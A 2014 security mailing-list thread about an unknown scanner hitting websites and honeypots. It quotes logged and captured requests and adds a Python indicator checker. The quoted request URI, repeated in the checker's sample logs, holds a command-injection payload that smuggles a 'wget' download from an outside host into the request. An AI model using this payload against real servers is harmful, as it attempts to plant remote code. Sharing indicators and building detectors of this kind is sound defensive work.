Nice find Robin! This hit each and every one of my honeypots. Same request. Really weird.
Here is what TShark shows me off one of my pcaps:

----
Node 0: 162.253.66.77:41790
Node 1: LOLHONEYPOT:80
139
GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x05

	300
HTTP/1.1 200 OK
Date: Mon, 28 Jul 2014 05:38:48 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed, 22 May 2013 06:24:30 GMT
ETag: "2e2f11-b1-4dd489e4be380"
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html><body><h1>It work
	154
s!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body></html>
----

Our winner appears to be a shared hosting provider:

27176 | 162.253.66.0/24 | DATAWAGON | US | DATAWAGON.NET | DATAWAGON LLC

On Mon, Jul 28, 2014 at 11:03 AM, xgermx <xge...@gmail.com> wrote:
> Seeing hits from 16X.XXX.XX.X7
> Based on the name, I'd have to guess reflective DNS DDoS
> Registrant phone for proxypipe.com is +1.8557769900 which actually works
> and an IVR picks up :) I selected option 2 for tech support to complain
> that the other kidz are laughing at my lame apache 0day but my call was
> shunted.
>
> xgermx
>
>
> On Mon, Jul 28, 2014 at 10:30 AM, Frank Michael <frankcmich...@gmail.com>
> wrote:
>
>> Various sources confirming the same thing for other sites. All on 7/28.
>> Keep an eye open.
>>
>> On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:
>>
>> I've got a site that was scanned this morning by a tool that left these
>> entries in the logs:
>>
>> [HTTP_USER_AGENT] => chroot-apach0day
>> [HTTP_REFERRER] => /xA/x0a/x05
>> [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;
>>
>> Anyone recognise it? That user agent isn't coming up in google searches.
>>
>> Robin
>>
>

-- 
Ben Jackson - Mayhemic Labs
b...@mayhemiclabs.com - http://www.mayhemiclabs.com - +1-508-296-0267
"Assume that what is in the power of one man to do, is in the power of another"
_______________________________________________ Pauldotcom mailing list Pauldotcom@mail.securityweekly.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
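Added example, not from the thread or any poster: a small Python checker that runs the indicators posted above (the user agent, the referrer value and the URI markers) over Apache combined-format access log lines, with constructed sample lines. One caveat it encodes: the scanner sends the header spelled "Referrer:", which Apache's %{Referer}i does not record, so in a combined log the user agent and URI are the reliable signals.

```python
import re
from urllib.parse import unquote

# Indicators taken from the log entries and pcap posted in this thread.
SCANNER_UA = "chroot-apach0day"
SCANNER_REFERRER = "/xA/x0a/x05"
URI_MARKERS = ("cDDOSv2dns", "proxypipe.com/apach0day")

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referrer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def match_scanner(entry):
    """Return the list of indicators from the thread that a parsed entry matches."""
    hits = []
    if entry["ua"] == SCANNER_UA:
        hits.append("user-agent")
    # The scanner's header is spelled "Referrer:", which %{Referer}i does not log,
    # so this column is normally "-" in a combined log and only a weak signal.
    if entry["referrer"] == SCANNER_REFERRER:
        hits.append("referrer")
    # Decode %20 etc. so the check works whether or not the request was URL-encoded.
    uri = unquote(entry["uri"])
    if any(marker in uri for marker in URI_MARKERS):
        hits.append("uri")
    return hits

def scan_log(lines):
    """Return (client ip, matched indicators) for every line that looks like this scanner."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry and (hits := match_scanner(entry)):
            findings.append((entry["ip"], hits))
    return findings

# Constructed sample lines: the first mirrors the request from the thread, the second is benign.
SAMPLE_LOG = [
    '162.253.66.77 - - [28/Jul/2014:05:38:48 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 177 "-" "chroot-apach0day"',
    '203.0.113.5 - - [28/Jul/2014:06:12:01 +0000] "GET /index.html HTTP/1.1" 200 177 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"',
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, "matched", ", ".join(hits))
```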